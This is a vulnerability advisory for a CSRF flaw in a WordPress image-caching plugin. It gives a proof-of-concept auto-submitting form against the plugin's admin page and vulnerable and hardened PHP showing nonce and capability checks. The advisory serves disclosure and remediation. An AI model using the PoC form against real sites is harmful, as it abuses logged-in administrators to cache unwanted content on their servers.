wpexploit | Daniel Ruf | WPEX-ID: B50E7622-C1DC-485B-A5F5-B010B40EEF20
History: May 17, 2022 - 12:00 a.m.

Hot Linked Image Cacher <= 1.16 - Image upload/cache abuse via CSRF


EPSS: 0.001 (Low), percentile 43.4%

The plugin is vulnerable to CSRF. This can be used to store / cache images from external domains on the server, which could lead to legal risks (due to copyright violations or licensing rules).

<form id="test" action="https://example.com/wp-admin/tools.php?page=hot-linked-image-cacher%2Fhotlinked-image-cacher.php" method="POST">
    <input type="text" name="domains[]" value="example.com">
    <input type="text" name="urlmethod" value="curl">
    <input type="text" name="postid" value="enter a post id here">
    <input type="text" name="step" value="3">
    <input type="text" name="Submit" value="Cache These Images »">
</form>
<script>
    document.getElementById("test").submit();
</script>
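The request above succeeds because nothing ties it to a form the site rendered for the logged-in user. The usual WordPress fix is a nonce bound to the action plus an explicit capability check before any side effect. The snippet below is an added illustration, not the plugin's own code; the `hlic_*` function and nonce names and the `hlic_cache_images()` worker are hypothetical.

```php
<?php
// Vulnerable shape (hypothetical): acts on the POST fields as soon as
// step=3 arrives, with no proof the request originated on this site.
function hlic_handle_cache_request_vulnerable() {
    if ( isset( $_POST['step'] ) && '3' === $_POST['step'] ) {
        $domains = (array) $_POST['domains'];
        hlic_cache_images( $domains, (int) $_POST['postid'] ); // hypothetical worker
    }
}

// Hardened form: wp_nonce_field() embeds a nonce tied to the action name
// and the current user (plus a referer field), so a cross-site form cannot
// reproduce it.
function hlic_render_form() {
    echo '<form method="post">';
    wp_nonce_field( 'hlic_cache_images', 'hlic_nonce' );
    echo '<input type="text" name="domains[]">';
    echo '<input type="text" name="postid">';
    echo '<input type="hidden" name="step" value="3">';
    submit_button( 'Cache These Images »' );
    echo '</form>';
}

// Hardened handler: verify the nonce and the capability before touching
// anything. check_admin_referer() stops the request when the nonce is
// missing, forged, expired, or was issued to a different user.
function hlic_handle_cache_request_hardened() {
    if ( ! isset( $_POST['step'] ) || '3' !== $_POST['step'] ) {
        return;
    }
    check_admin_referer( 'hlic_cache_images', 'hlic_nonce' );
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }
    $domains = array_map( 'sanitize_text_field', (array) $_POST['domains'] );
    hlic_cache_images( $domains, absint( $_POST['postid'] ) ); // hypothetical worker
}
```

The nonce check alone defeats the PoC form above; the capability check is kept separately so a nonce leaked to a low-privilege account still cannot trigger the cache action.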
